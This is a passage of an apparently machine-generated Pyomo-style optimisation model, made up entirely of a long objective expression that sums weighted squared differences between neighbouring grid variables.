8.11690209768664*m.x744 - 8.11690209768664*m.x771)**2 + (1.3*m.x770 - 1.3*m.x771)**2) +
2.94728071564996*((8.11690209768664*m.x745 - 8.11690209768664*m.x772)**2 + (1.3*m.x771 - 1.3*
m.x772)**2) + 2.94728071564996*((8.11690209768664*m.x746 - 8.11690209768664*m.x773)**2 + (1.3*
m.x772 - 1.3*m.x773)**2) + 2.94728071564996*((8.11690209768664*m.x747 - 8.11690209768664*m.x774)
**2 + (1.3*m.x773 - 1.3*m.x774)**2) + 2.94728071564996*((8.11690209768664*m.x748 -
8.11690209768664*m.x775)**2 + (1.3*m.x774 - 1.3*m.x775)**2) + 2.94728071564996*((8.11690209768664
*m.x749 - 8.11690209768664*m.x776)**2 + (1.3*m.x775 - 1.3*m.x776)**2) + 2.94728071564996*((
8.11690209768664*m.x750 - 8.11690209768664*m.x777)**2 + (1.3*m.x776 - 1.3*m.x777)**2) +
2.94728071564996*((8.11690209768664*m.x751 - 8.11690209768664*m.x778)**2 + (1.3*m.x777 - 1.3*
m.x778)**2) + 2.94728071564996*((8.11690209768664*m.x752 - 8.11690209768664*m.x779)**2 + (1.3*
m.x778 - 1.3*m.x779)**2) + 2.94728071564996*((8.11690209768664*m.x753 - 8.11690209768664*m.x780)
**2 + (1.3*m.x779 - 1.3*m.x780)**2) + 2.94728071564996*((8.11690209768664*m.x754 -
8.11690209768664*m.x781)**2 + (1.3*m.x780 - 1.3*m.x781)**2) + 2.94728071564996*((8.11690209768664
*m.x755 - 8.11690209768664*m.x782)**2 + (1.3*m.x781 - 1.3*m.x782)**2) + 2.94728071564996*((
8.11690209768664*m.x756 - 8.11690209768664*m.x783)**2 + (1.3*m.x782 - 1.3*m.x783)**2) +
2.98392983330721*((8.11690209768664*m.x758 - 8.11690209768664*m.x785)**2 + (1.3*m.x784 - 1.3*
m.x785)**2) + 2.98392983330721*((8.11690209768664*m.x759 - 8.11690209768664*m.x786)**2 + (1.3*
m.x785 - 1.3*m.x786)**2) + 2.98392983330721*((8.11690209768664*m.x760 - 8.11690209768664*m.x787)
**2 + (1.3*m.x786 - 1.3*m.x787)**2) + 2.98392983330721*((8.11690209768664*m.x761 -
8.11690209768664*m.x788)**2 + (1.3*m.x787 - 1.3*m.x788)**2) + 2.98392983330721*((8.11690209768664
*m.x762 - 8.11690209768664*m.x789)**2 + (1.3*m.x788 - 1.3*m.x789)**2) + 2.98392983330721*((
8.11690209768664*m.x763 - 8.11690209768664*m.x790)**2 + (1.3*m.x789 - 1.3*m.x790)**2) +
2.98392983330721*((8.11690209768664*m.x764 - 8.11690209768664*m.x791)**2 + (1.3*m.x790 - 1.3*
m.x791)**2) + 2.98392983330721*((8.11690209768664*m.x765 - 8.11690209768664*m.x792)**2 + (1.3*
m.x791 - 1.3*m.x792)**2) + 2.98392983330721*((8.11690209768664*m.x766 - 8.11690209768664*m.x793)
**2 + (1.3*m.x792 - 1.3*m.x793)**2) + 2.98392983330721*((8.11690209768664*m.x767 -
8.11690209768664*m.x794)**2 + (1.3*m.x793 - 1.3*m.x794)**2) + 2.98392983330721*((8.11690209768664
*m.x768 - 8.11690209768664*m.x795)**2 + (1.3*m.x794 - 1.3*m.x795)**2) + 2.98392983330721*((
8.11690209768664*m.x769 - 8.11690209768664*m.x796)**2 + (1.3*m.x795 - 1.3*m.x796)**2) +
2.98392983330721*((8.11690209768664*m.x770 - 8.11690209768664*m.x797)**2 + (1.3*m.x796 - 1.3*
m.x797)**2) + 2.98392983330721*((8.11690209768664*m.x771 - 8.11690209768664*m.x798)**2 + (1.3*
m.x797 - 1.3*m.x798)**2) + 2.98392983330721*((8.11690209768664*m.x772 - 8.11690209768664*m.x799)
**2 + (1.3*m.x798 - 1.3*m.x799)**2) + 2.98392983330721*((8.11690209768664*m.x773 -
8.11690209768664*m.x800)**2 + (1.3*m.x799 - 1.3*m.x800)**2) + 2.98392983330721*((8.11690209768664
*m.x774 - 8.11690209768664*m.x801)**2 + (1.3*m.x800 - 1.3*m.x801)**2) + 2.98392983330721*((
8.11690209768664*m.x775 - 8.11690209768664*m.x802)**2 + (1.3*m.x801 - 1.3*m.x802)**2) +
2.98392983330721*((8.11690209768664*m.x776 - 8.11690209768664*m.x803)**2 + (1.3*m.x802 - 1.3*
m.x803)**2) + 2.98392983330721*((8.11690209768664*m.x777 - 8.11690209768664*m.x804)**2 + (1.3*
m.x803 - 1.3*m.x804)**2) + 2.98392983330721*((8.11690209768664*m.x778 - 8.11690209768664*m.x805)
**2 + (1.3*m.x804 - 1.3*m.x805)**2) + 2.98392983330721*((8.11690209768664*m.x779 -
8.11690209768664*m.x806)**2 + (1.3*m.x805 - 1.3*m.x806)**2) + 2.98392983330721*((8.11690209768664
*m.x780 - 8.11690209768664*m.x807)**2 + (1.3*m.x806 - 1.3*m.x807)**2) + 2.98392983330721*((
8.11690209768664*m.x781 - 8.11690209768664*m.x808)**2 + (1.3*m.x807 - 1.3*m.x808)**2) +
2.98392983330721*((8.11690209768664*m.x782 - 8.11690209768664*m.x809)**2 + (1.3*m.x808 - 1.3*
m.x809)**2) + 2.98392983330721*((8.11690209768664*m.x783 - 8.11690209768664*m.x810)**2 + (1.3*
m.x809 - 1.3*m.x810)**2) + 3.03495253422332*((8.11690209768664*m.x785 - 8.11690209768664*m.x812)
**2 + (1.3*m.x811 - 1.3*m.x812)**2) + 3.03495253422332*((8.11690209768664*m.x786 -
8.11690209768664*m.x813)**2 + (1.3*m.x812 - 1.3*m.x813)**2) + 3.03495253422332*((8.11690209768664
*m.x787 - 8.11690209768664*m.x814)**2 + (1.3*m.x813 - 1.3*m.x814)**2) + 3.03495253422332*((
8.11690209768664*m.x788 - 8.11690209768664*m.x815)**2 + (1.3*m.x814 - 1.3*m.x815)**2) +
3.03495253422332*((8.11690209768664*m.x789 - 8.11690209768664*m.x816)**2 + (1.3*m.x815 - 1.3*
m.x816)**2) + 3.03495253422332*((8.11690209768664*m.x790 - 8.11690209768664*m.x817)**2 + (1.3*
m.x816 - 1.3*m.x817)**2) + 3.03495253422332*((8.11690209768664*m.x791 - 8.11690209768664*m.x818)
**2 + (1.3*m.x817 - 1.3*m.x818)**2) + 3.03495253422332*((8.11690209768664*m.x792 -
8.11690209768664*m.x819)**2 + (1.3*m.x818 - 1.3*m.x819)**2) + 3.03495253422332*((8.11690209768664
*m.x793 - 8.11690209768664*m.x820)**2 + (1.3*m.x819 - 1.3*m.x820)**2) + 3.03495253422332*((
8.11690209768664*m.x794 - 8.11690209768664*m.x821)**2 + (1.3*m.x820 - 1.3*m.x821)**2) +
3.03495253422332*((8.11690209768664*m.x795 - 8.11690209768664*m.x822)**2 + (1.3*m.x821 - 1.3*
m.x822)**2) + 3.03495253422332*((8.11690209768664*m.x796 - 8.11690209768664*m.x823)**2 + (1.3*
m.x822 - 1.3*m.x823)**2) + 3.03495253422332*((8.11690209768664*m.x797 - 8.11690209768664*m.x824)
**2 + (1.3*m.x823 - 1.3*m.x824)**2) + 3.03495253422332*((8.11690209768664*m.x798 -
8.11690209768664*m.x825)**2 + (1.3*m.x824 - 1.3*m.x825)**2) + 3.03495253422332*((8.11690209768664
*m.x799 - 8.11690209768664*m.x826)**2 + (1.3*m.x825 - 1.3*m.x826)**2) + 3.03495253422332*((
8.11690209768664*m.x800 - 8.11690209768664*m.x827)**2 + (1.3*m.x826 - 1.3*m.x827)**2) +
3.03495253422332*((8.11690209768664*m.x801 - 8.11690209768664*m.x828)**2 + (1.3*m.x827 - 1.3*
m.x828)**2) + 3.03495253422332*((8.11690209768664*m.x802 - 8.11690209768664*m.x829)**2 + (1.3*
m.x828 - 1.3*m.x829)**2) + 3.03495253422332*((8.11690209768664*m.x803 - 8.11690209768664*m.x830)
**2 + (1.3*m.x829 - 1.3*m.x830)**2) + 3.03495253422332*((8.11690209768664*m.x804 -
8.11690209768664*m.x831)**2 + (1.3*m.x830 - 1.3*m.x831)**2) + 3.03495253422332*((8.11690209768664
*m.x805 - 8.11690209768664*m.x832)**2 + (1.3*m.x831 - 1.3*m.x832)**2) + 3.03495253422332*((
8.11690209768664*m.x806 - 8.11690209768664*m.x833)**2 + (1.3*m.x832 - 1.3*m.x833)**2) +
3.03495253422332*((8.11690209768664*m.x807 - 8.11690209768664*m.x834)**2 + (1.3*m.x833 - 1.3*
m.x834)**2) + 3.03495253422332*((8.11690209768664*m.x808 - 8.11690209768664*m.x835)**2 + (1.3*
m.x834 - 1.3*m.x835)**2) + 3.03495253422332*((8.11690209768664*m.x809 - 8.11690209768664*m.x836)
**2 + (1.3*m.x835 - 1.3*m.x836)**2) + 3.03495253422332*((8.11690209768664*m.x810 -
8.11690209768664*m.x837)**2 + (1.3*m.x836 - 1.3*m.x837)**2) + 3.10003657380856*((8.11690209768664
*m.x812 - 8.11690209768664*m.x839)**2 + (1.3*m.x838 - 1.3*m.x839)**2) + 3.10003657380856*((
8.11690209768664*m.x813 - 8.11690209768664*m.x840)**2 + (1.3*m.x839 - 1.3*m.x840)**2) +
3.10003657380856*((8.11690209768664*m.x814 - 8.11690209768664*m.x841)**2 + (1.3*m.x840 - 1.3*
m.x841)**2) + 3.10003657380856*((8.11690209768664*m.x815 - 8.11690209768664*m.x842)**2 + (1.3*
m.x841 - 1.3*m.x842)**2) + 3.10003657380856*((8.11690209768664*m.x816 - 8.11690209768664*m.x843)
**2 + (1.3*m.x842 - 1.3*m.x843)**2) + 3.10003657380856*((8.11690209768664*m.x817 -
8.11690209768664*m.x844)**2 + (1.3*m.x843 - 1.3*m.x844)**2) + 3.10003657380856*((8.11690209768664
*m.x818 - 8.11690209768664*m.x845)**2 + (1.3*m.x844 - 1.3*m.x845)**2) + 3.10003657380856*((
8.11690209768664*m.x819 - 8.11690209768664*m.x846)**2 + (1.3*m.x845 - 1.3*m.x846)**2) +
3.10003657380856*((8.11690209768664*m.x820 - 8.11690209768664*m.x847)**2 + (1.3*m.x846 - 1.3*
m.x847)**2) + 3.10003657380856*((8.11690209768664*m.x821 - 8.11690209768664*m.x848)**2 + (1.3*
m.x847 - 1.3*m.x848)**2) + 3.10003657380856*((8.11690209768664*m.x822 - 8.11690209768664*m.x849)
**2 + (1.3*m.x848 - 1.3*m.x849)**2) + 3.10003657380856*((8.11690209768664*m.x823 -
8.11690209768664*m.x850)**2 + (1.3*m.x849 - 1.3*m.x850)**2) + 3.10003657380856*((8.11690209768664
*m.x824 - 8.11690209768664*m.x851)**2 + (1.3*m.x850 - 1.3*m.x851)**2) + 3.10003657380856*((
8.11690209768664*m.x825 - 8.11690209768664*m.x852)**2 + (1.3*m.x851 - 1.3*m.x852)**2) +
3.10003657380856*((8.11690209768664*m.x826 - 8.11690209768664*m.x853)**2 + (1.3*m.x852 - 1.3*
m.x853)**2) + 3.10003657380856*((8.11690209768664*m.x827 - 8.11690209768664*m.x854)**2 + (1.3*
m.x853 - 1.3*m.x854)**2) + 3.10003657380856*((8.11690209768664*m.x828 - 8.11690209768664*m.x855)
**2 + (1.3*m.x854 - 1.3*m.x855)**2) + 3.10003657380856*((8.11690209768664*m.x829 -
8.11690209768664*m.x856)**2 + (1.3*m.x855 - 1.3*m.x856)**2) + 3.10003657380856*((8.11690209768664
*m.x830 - 8.11690209768664*m.x857)**2 + (1.3*m.x856 - 1.3*m.x857)**2) + 3.10003657380856*((
8.11690209768664*m.x831 - 8.11690209768664*m.x858)**2 + (1.3*m.x857 - 1.3*m.x858)**2) +
3.10003657380856*((8.11690209768664*m.x832 - 8.11690209768664*m.x859)**2 + (1.3*m.x858 - 1.3*
m.x859)**2) + 3.10003657380856*((8.11690209768664*m.x833 - 8.11690209768664*m.x860)**2 + (1.3*
m.x859 - 1.3*m.x860)**2) + 3.10003657380856*((8.11690209768664*m.x834 - 8.11690209768664*m.x861)
**2 + (1.3*m.x860 - 1.3*m.x861)**2) + 3.10003657380856*((8.11690209768664*m.x835 -
8.11690209768664*m.x862)**2 + (1.3*m.x861 - 1.3*m.x862)**2) + 3.10003657380856*((8.11690209768664
*m.x836 - 8.11690209768664*m.x863)**2 + (1.3*m.x862 - 1.3*m.x863)**2) + 3.10003657380856*((
8.11690209768664*m.x837 - 8.11690209768664*m.x864)**2 + (1.3*m.x863 - 1.3*m.x864)**2) +
3.17874498030212*((8.11690209768664*m.x839 - 8.11690209768664*m.x866)**2 + (1.3*m.x865 - 1.3*
m.x866)**2) + 3.17874498030212*((8.11690209768664*m.x840 - 8.11690209768664*m.x867)**2 + (1.3*
m.x866 - 1.3*m.x867)**2) + 3.17874498030212*((8.11690209768664*m.x841 - 8.11690209768664*m.x868)
**2 + (1.3*m.x867 - 1.3*m.x868)**2) + 3.17874498030212*((8.11690209768664*m.x842 -
8.11690209768664*m.x869)**2 + (1.3*m.x868 - 1.3*m.x869)**2) + 3.17874498030212*((8.11690209768664
*m.x843 - 8.11690209768664*m.x870)**2 + (1.3*m.x869 - 1.3*m.x870)**2) + 3.17874498030212*((
8.11690209768664*m.x844 - 8.11690209768664*m.x871)**2 + (1.3*m.x870 - 1.3*m.x871)**2) +
3.17874498030212*((8.11690209768664*m.x845 - 8.11690209768664*m.x872)**2 + (1.3*m.x871 - 1.3*
m.x872)**2) + 3.17874498030212*((8.11690209768664*m.x846 - 8.11690209768664*m.x873)**2 + (1.3*
m.x872 - 1.3*m.x873)**2) + 3.17874498030212*((8.11690209768664*m.x847 - 8.11690209768664*m.x874)
**2 + (1.3*m.x873 - 1.3*m.x874)**2) + 3.17874498030212*((8.11690209768664*m.x848 -
8.11690209768664*m.x875)**2 + (1.3*m.x874 - 1.3*m.x875)**2) + 3.17874498030212*((8.11690209768664
*m.x849 - 8.11690209768664*m.x876)**2 + (1.3*m.x875 - 1.3*m.x876)**2) + 3.17874498030212*((
8.11690209768664*m.x850 - 8.11690209768664*m.x877)**2 + (1.3*m.x876 - 1.3*m.x877)**2) +
3.17874498030212*((8.11690209768664*m.x851 - 8.11690209768664*m.x878)**2 + (1.3*m.x877 - 1.3*
m.x878)**2) + 3.17874498030212*((8.11690209768664*m.x852 - 8.11690209768664*m.x879)**2 + (1.3*
m.x878 - 1.3*m.x879)**2) + 3.17874498030212*((8.11690209768664*m.x853 - 8.11690209768664*m.x880)
**2 + (1.3*m.x879 - 1.3*m.x880)**2) + 3.17874498030212*((8.11690209768664*m.x854 -
8.11690209768664*m.x881)**2 + (1.3*m.x880 - 1.3*m.x881)**2) + 3.17874498030212*((8.11690209768664
*m.x855 - 8.11690209768664*m.x882)**2 + (1.3*m.x881 - 1.3*m.x882)**2) + 3.17874498030212*((
8.11690209768664*m.x856 - 8.11690209768664*m.x883)**2 + (1.3*m.x882 - 1.3*m.x883)**2) +
3.17874498030212*((8.11690209768664*m.x857 - 8.11690209768664*m.x884)**2 + (1.3*m.x883 - 1.3*
m.x884)**2) + 3.17874498030212*((8.11690209768664*m.x858 - 8.11690209768664*m.x885)**2 + (1.3*
m.x884 - 1.3*m.x885)**2) + 3.17874498030212*((8.11690209768664*m.x859 - 8.11690209768664*m.x886)
**2 + (1.3*m.x885 - 1.3*m.x886)**2) + 3.17874498030212*((8.11690209768664*m.x860 -
8.11690209768664*m.x887)**2 + (1.3*m.x886 - 1.3*m.x887)**2) + 3.17874498030212*((8.11690209768664
*m.x861 - 8.11690209768664*m.x888)**2 + (1.3*m.x887 - 1.3*m.x888)**2) + 3.17874498030212*((
8.11690209768664*m.x862 - 8.11690209768664*m.x889)**2 + (1.3*m.x888 - 1.3*m.x889)**2) +
3.17874498030212*((8.11690209768664*m.x863 - 8.11690209768664*m.x890)**2 + (1.3*m.x889 - 1.3*
m.x890)**2) + 3.17874498030212*((8.11690209768664*m.x864 - 8.11690209768664*m.x891)**2 + (1.3*
m.x890 - 1.3*m.x891)**2) + 3.27049269683565*((8.11690209768664*m.x866 - 8.11690209768664*m.x893)
**2 + (1.3*m.x892 - 1.3*m.x893)**2) + 3.27049269683565*((8.11690209768664*m.x867 -
8.11690209768664*m.x894)**2 + (1.3*m.x893 - 1.3*m.x894)**2) + 3.27049269683565*((8.11690209768664
*m.x868 - 8.11690209768664*m.x895)**2 + (1.3*m.x894 - 1.3*m.x895)**2) + 3.27049269683565*((
8.11690209768664*m.x869 - 8.11690209768664*m.x896)**2 + (1.3*m.x895 - 1.3*m.x896)**2) +
3.27049269683565*((8.11690209768664*m.x870 - 8.11690209768664*m.x897)**2 + (1.3*m.x896 - 1.3*
m.x897)**2) + 3.27049269683565*((8.11690209768664*m.x871 - 8.11690209768664*m.x898)**2 + (1.3*
m.x897 - 1.3*m.x898)**2) + 3.27049269683565*((8.11690209768664*m.x872 - 8.11690209768664*m.x899)
**2 + (1.3*m.x898 - 1.3*m.x899)**2) + 3.27049269683565*((8.11690209768664*m.x873 -
8.11690209768664*m.x900)**2 + (1.3*m.x899 - 1.3*m.x900)**2) + 3.27049269683565*((8.11690209768664
*m.x874 - 8.11690209768664*m.x901)**2 + (1.3*m.x900 - 1.3*m.x901)**2) + 3.27049269683565*((
8.11690209768664*m.x875 - 8.11690209768664*m.x902)**2 + (1.3*m.x901 - 1.3*m.x902)**2) +
3.27049269683565*((8.11690209768664*m.x876 - 8.11690209768664*m.x903)**2 + (1.3*m.x902 - 1.3*
m.x903)**2) + 3.27049269683565*((8.11690209768664*m.x877 - 8.11690209768664*m.x904)**2 + (1.3*
m.x903 - 1.3*m.x904)**2) + 3.27049269683565*((8.11690209768664*m.x878 - 8.11690209768664*m.x905)
**2 + (1.3*m.x904 - 1.3*m.x905)**2) + 3.27049269683565*((8.11690209768664*m.x879 -
8.11690209768664*m.x906)**2 + (1.3*m.x905 - 1.3*m.x906)**2) + 3.27049269683565*((8.11690209768664
*m.x880 - 8.11690209768664*m.x907)**2 + (1.3*m.x906 - 1.3*m.x907)**2) + 3.27049269683565*((
8.11690209768664*m.x881 - 8.11690209768664*m.x908)**2 + (1.3*m.x907 - 1.3*m.x908)**2) +
3.27049269683565*((8.11690209768664*m.x882 - 8.11690209768664*m.x909)**2 + (1.3*m.x908 - 1.3*
m.x909)**2) + 3.27049269683565*((8.11690209768664*m.x883 - 8.11690209768664*m.x910)**2 + (1.3*
m.x909 - 1.3*m.x910)**2) + 3.27049269683565*((8.11690209768664*m.x884 - 8.11690209768664*m.x911)
**2 + (1.3*m.x910 - 1.3*m.x911)**2) + 3.27049269683565*((8.11690209768664*m.x885 -
8.11690209768664*m.x912)**2 + (1.3*m.x911 - 1.3*m.x912)**2) + 3.27049269683565*((8.11690209768664
*m.x886 - 8.11690209768664*m.x913)**2 + (1.3*m.x912 - 1.3*m.x913)**2) + 3.27049269683565*((
8.11690209768664*m.x887 - 8.11690209768664*m.x914)**2 + (1.3*m.x913 - 1.3*m.x914)**2) +
3.27049269683565*((8.11690209768664*m.x888 - 8.11690209768664*m.x915)**2 + (1.3*m.x914 - 1.3*
m.x915)**2) + 3.27049269683565*((8.11690209768664*m.x889 - 8.11690209768664*m.x916)**2 + (1.3*
m.x915 - 1.3*m.x916)**2) + 3.27049269683565*((8.11690209768664*m.x890 - 8.11690209768664*m.x917)
**2 + (1.3*m.x916 - 1.3*m.x917)**2) + 3.27049269683565*((8.11690209768664*m.x891 -
8.11690209768664*m.x918)**2 + (1.3*m.x917 - 1.3*m.x918)**2) + 3.37452161263043*((8.11690209768664
*m.x893 - 8.11690209768664*m.x920)**2 + (1.3*m.x919 - 1.3*m.x920)**2) + 3.37452161263043*((
8.11690209768664*m.x894 - 8.11690209768664*m.x921)**2 + (1.3*m.x920 - 1.3*m.x921)**2) +
3.37452161263043*((8.11690209768664*m.x895 - 8.11690209768664*m.x922)**2 + (1.3*m.x921 - 1.3*
m.x922)**2) + 3.37452161263043*((8.11690209768664*m.x896 - 8.11690209768664*m.x923)**2 + (1.3*
m.x922 - 1.3*m.x923)**2) + 3.37452161263043*((8.11690209768664*m.x897 - 8.11690209768664*m.x924)
**2 + (1.3*m.x923 - 1.3*m.x924)**2) + 3.37452161263043*((8.11690209768664*m.x898 -
8.11690209768664*m.x925)**2 + (1.3*m.x924 - 1.3*m.x925)**2) + 3.37452161263043*((8.11690209768664
*m.x899 - 8.11690209768664*m.x926)**2 + (1.3*m.x925 - 1.3*m.x926)**2) + 3.37452161263043*((
8.11690209768664*m.x900 - 8.11690209768664*m.x927)**2 + (1.3*m.x926 - 1.3*m.x927)**2) +
3.37452161263043*((8.11690209768664*m.x901 - 8.11690209768664*m.x928)**2 + (1.3*m.x927 - 1.3*
m.x928)**2) + 3.37452161263043*((8.11690209768664*m.x902 - 8.11690209768664*m.x929)**2 + (1.3*
m.x928 - 1.3*m.x929)**2) + 3.37452161263043*((8.11690209768664*m.x903 - 8.11690209768664*m.x930)
**2 + (1.3*m.x929 - 1.3*m.x930)**2) + 3.37452161263043*((8.11690209768664*m.x904 -
8.11690209768664*m.x931)**2 + (1.3*m.x930 - 1.3*m.x931)**2) + 3.37452161263043*((8.11690209768664
*m.x905 - 8.11690209768664*m.x932)**2 + (1.3*m.x931 - 1.3*m.x932)**2) + 3.37452161263043*((
8.11690209768664*m.x906 - 8.11690209768664*m.x933)**2 + (1.3*m.x932 - 1.3*m.x933)**2) +
3.37452161263043*((8.11690209768664*m.x907 - 8.11690209768664*m.x934)**2 + (1.3*m.x933 - 1.3*
m.x934)**2) + 3.37452161263043*((8.11690209768664*m.x908 - 8.11690209768664*m.x935)**2 + (1.3*
m.x934 - 1.3*m.x935)**2) + 3.37452161263043*((8.11690209768664*m.x909 - 8.11690209768664*m.x936)
**2 + (1.3*m.x935 - 1.3*m.x936)**2) + 3.37452161263043*((8.11690209768664*m.x910 -
8.11690209768664*m.x937)**2 + (1.3*m.x936 - 1.3*m.x937)**2) + 3.37452161263043*((8.11690209768664
*m.x911 - 8.11690209768664*m.x938)**2 + (1.3*m.x937 - 1.3*m.x938)**2) + 3.37452161263043*((
8.11690209768664*m.x912 - 8.11690209768664*m.x939)**2 + (1.3*m.x938 - 1.3*m.x939)**2) +
3.37452161263043*((8.11690209768664*m.x913 - 8.11690209768664*m.x940)**2 + (1.3*m.x939 - 1.3*
m.x940)**2) + 3.37452161263043*((8.11690209768664*m.x914 - 8.11690209768664*m.x941)**2 + (1.3*
m.x940 - 1.3*m.x941)**2) + 3.37452161263043*((8.11690209768664*m.x915 - 8.11690209768664*m.x942)
**2 + (1.3*m.x941 - 1.3*m.x942)**2) + 3.37452161263043*((8.11690209768664*m.x916 -
8.11690209768664*m.x943)**2 + (1.3*m.x942 - 1.3*m.x943)**2) + 3.37452161263043*((8.11690209768664
*m.x917 - 8.11690209768664*m.x944)**2 + (1.3*m.x943 - 1.3*m.x944)**2) + 3.37452161263043*((
8.11690209768664*m.x918 - 8.11690209768664*m.x945)**2 + (1.3*m.x944 - 1.3*m.x945)**2) +
3.48987601495028*((8.11690209768664*m.x920 - 8.11690209768664*m.x947)**2 + (1.3*m.x946 - 1.3*
m.x947)**2) + 3.48987601495028*((8.11690209768664*m.x921 - 8.11690209768664*m.x948)**2 + (1.3*
m.x947 - 1.3*m.x948)**2) + 3.48987601495028*((8.11690209768664*m.x922 - 8.11690209768664*m.x949)
**2 + (1.3*m.x948 - 1.3*m.x949)**2) + 3.48987601495028*((8.11690209768664*m.x923 -
8.11690209768664*m.x950)**2 + (1.3*m.x949 - 1.3*m.x950)**2) + 3.48987601495028*((8.11690209768664
*m.x924 - 8.11690209768664*m.x951)**2 + (1.3*m.x950 - 1.3*m.x951)**2) + 3.48987601495028*((
8.11690209768664*m.x925 - 8.11690209768664*m.x952)**2 + (1.3*m.x951 - 1.3*m.x952)**2) +
3.48987601495028*((8.11690209768664*m.x926 - 8.11690209768664*m.x953)**2 + (1.3*m.x952 - 1.3*
m.x953)**2) + 3.48987601495028*((8.11690209768664*m.x927 - 8.11690209768664*m.x954)**2 + (1.3*
m.x953 - 1.3*m.x954)**2) + 3.48987601495028*((8.11690209768664*m.x928 - 8.11690209768664*m.x955)
**2 + (1.3*m.x954 - 1.3*m.x955)**2) + 3.48987601495028*((8.11690209768664*m.x929 -
8.11690209768664*m.x956)**2 + (1.3*m.x955 - 1.3*m.x956)**2) + 3.48987601495028*((8.11690209768664
*m.x930 - 8.11690209768664*m.x957)**2 + (1.3*m.x956 - 1.3*m.x957)**2) + 3.48987601495028*((
8.11690209768664*m.x931 - 8.11690209768664*m.x958)**2 + (1.3*m.x957 - 1.3*m.x958)**2) +
3.48987601495028*((8.11690209768664*m.x932 - 8.11690209768664*m.x959)**2 + (1.3*m.x958 - 1.3*
m.x959)**2) + 3.48987601495028*((8.11690209768664*m.x933 - 8.11690209768664*m.x960)**2 + (1.3*
m.x959 - 1.3*m.x960)**2) + 3.48987601495028*((8.11690209768664*m.x934 - 8.11690209768664*m.x961)
**2 + (1.3*m.x960 - 1.3*m.x961)**2) + 3.48987601495028*((8.11690209768664*m.x935 -
8.11690209768664*m.x962)**2 + (1.3*m.x961 - 1.3*m.x962)**2) + 3.48987601495028*((8.11690209768664
*m.x936 - 8.11690209768664*m.x963)**2 + (1.3*m.x962 - 1.3*m.x963)**2) + 3.48987601495028*((
8.11690209768664*m.x937 - 8.11690209768664*m.x964)**2 + (1.3*m.x963 - 1.3*m.x964)**2) +
3.48987601495028*((8.11690209768664*m.x938 - 8.11690209768664*m.x965)**2 + (1.3*m.x964 - 1.3*
m.x965)**2) + 3.48987601495028*((8.11690209768664*m.x939 - 8.11690209768664*m.x966)**2 + (1.3*
m.x965 - 1.3*m.x966)**2) + 3.48987601495028*((8.11690209768664*m.x940 - 8.11690209768664*m.x967)
**2 + (1.3*m.x966 - 1.3*m.x967)**2) + 3.48987601495028*((8.11690209768664*m.x941 -
8.11690209768664*m.x968)**2 + (1.3*m.x967 - 1.3*m.x968)**2) + 3.48987601495028*((8.11690209768664
*m.x942 - 8.11690209768664*m.x969)**2 + (1.3*m.x968 - 1.3*m.x969)**2) + 3.48987601495028*((
8.11690209768664*m.x943 - 8.11690209768664*m.x970)**2 + (1.3*m.x969 - 1.3*m.x970)**2) +
3.48987601495028*((8.11690209768664*m.x944 - 8.11690209768664*m.x971)**2 + (1.3*m.x970 - 1.3*
m.x971)**2) + 3.48987601495028*((8.11690209768664*m.x945 - 8.11690209768664*m.x972)**2 + (1.3*
m.x971 - 1.3*m.x972)**2) + 3.61538071680864*((8.11690209768664*m.x947 - 8.11690209768664*m.x974)
**2 + (1.3*m.x973 - 1.3*m.x974)**2) + 3.61538071680864*((8.11690209768664*m.x948 -
8.11690209768664*m.x975)**2 + (1.3*m.x974 - 1.3*m.x975)**2) + 3.61538071680864*((8.11690209768664
*m.x949 - 8.11690209768664*m.x976)**2 + (1.3*m.x975 - 1.3*m.x976)**2) + 3.61538071680864*((
8.11690209768664*m.x950 - 8.11690209768664*m.x977)**2 + (1.3*m.x976 - 1.3*m.x977)**2) +
3.61538071680864*((8.11690209768664*m.x951 - 8.11690209768664*m.x978)**2 + (1.3*m.x977 - 1.3*
m.x978)**2) + 3.61538071680864*((8.11690209768664*m.x952 - 8.11690209768664*m.x979)**2 + (1.3*
m.x978 - 1.3*m.x979)**2) + 3.61538071680864*((8.11690209768664*m.x953 - 8.11690209768664*m.x980)
**2 + (1.3*m.x979 - 1.3*m.x980)**2) + 3.61538071680864*((8.11690209768664*m.x954 -
8.11690209768664*m.x981)**2 + (1.3*m.x980 - 1.3*m.x981)**2) + 3.61538071680864*((8.11690209768664
*m.x955 - 8.11690209768664*m.x982)**2 + (1.3*m.x981 - 1.3*m.x982)**2) + 3.61538071680864*((
8.11690209768664*m.x956 - 8.11690209768664*m.x983)**2 + (1.3*m.x982 - 1.3*m.x983)**2) +
3.61538071680864*((8.11690209768664*m.x957 - 8.11690209768664*m.x984)**2 + (1.3*m.x983 - 1.3*
m.x984)**2) + 3.61538071680864*((8.11690209768664*m.x958 - 8.11690209768664*m.x985)**2 + (1.3*
m.x984 - 1.3*m.x985)**2) + 3.61538071680864*((8.11690209768664*m.x959 - 8.11690209768664*m.x986)
**2 + (1.3*m.x985 - 1.3*m.x986)**2) + 3.61538071680864*((8.11690209768664*m.x960 -
8.11690209768664*m.x987)**2 + (1.3*m.x986 - 1.3*m.x987)**2) + 3.61538071680864*((8.11690209768664
*m.x961 - 8.11690209768664*m.x988)**2 + (1.3*m.x987 - 1.3*m.x988)**2) + 3.61538071680864*((
8.11690209768664*m.x962 - 8.11690209768664*m.x989)**2 + (1.3*m.x988 - 1.3*m.x989)**2) +
3.61538071680864*((8.11690209768664*m.x963 - 8.11690209768664*m.x990)**2 + (1.3*m.x989 - 1.3*
m.x990)**2) + 3.61538071680864*((8.11690209768664*m.x964 - 8.11690209768664*m.x991)**2 + (1.3*
m.x990 - 1.3*m.x991)**2) + 3.61538071680864*((8.11690209768664*m.x965 - 8.11690209768664*m.x992)
**2 + (1.3*m.x991 - 1.3*m.x992)**2) + 3.61538071680864*((8.11690209768664*m.x966 -
8.11690209768664*m.x993)**2 + (1.3*m.x992 - 1.3*m.x993)**2) + 3.61538071680864*((8.11690209768664
*m.x967 - 8.11690209768664*m.x994)**2 + (1.3*m.x993 - 1.3*m.x994)**2) + 3.61538071680864*((
8.11690209768664*m.x968 - 8.11690209768664*m.x995)**2 + (1.3*m.x994 - 1.3*m.x995)**2) +
3.61538071680864*((8.11690209768664*m.x969 - 8.11690209768664*m.x996)**2 + (1.3*m.x995 - 1.3*
m.x996)**2) + 3.61538071680864*((8.11690209768664*m.x970 - 8.11690209768664*m.x997)**2 + (1.3*
m.x996 - 1.3*m.x997)**2) + 3.61538071680864*((8.11690209768664*m.x971 - 8.11690209768664*m.x998)
**2 + (1.3*m.x997 - 1.3*m.x998)**2) + 3.61538071680864*((8.11690209768664*m.x972 -
8.11690209768664*m.x999)**2 + (1.3*m.x998 - 1.3*m.x999)**2) + 3.74962423061392*((8.11690209768664
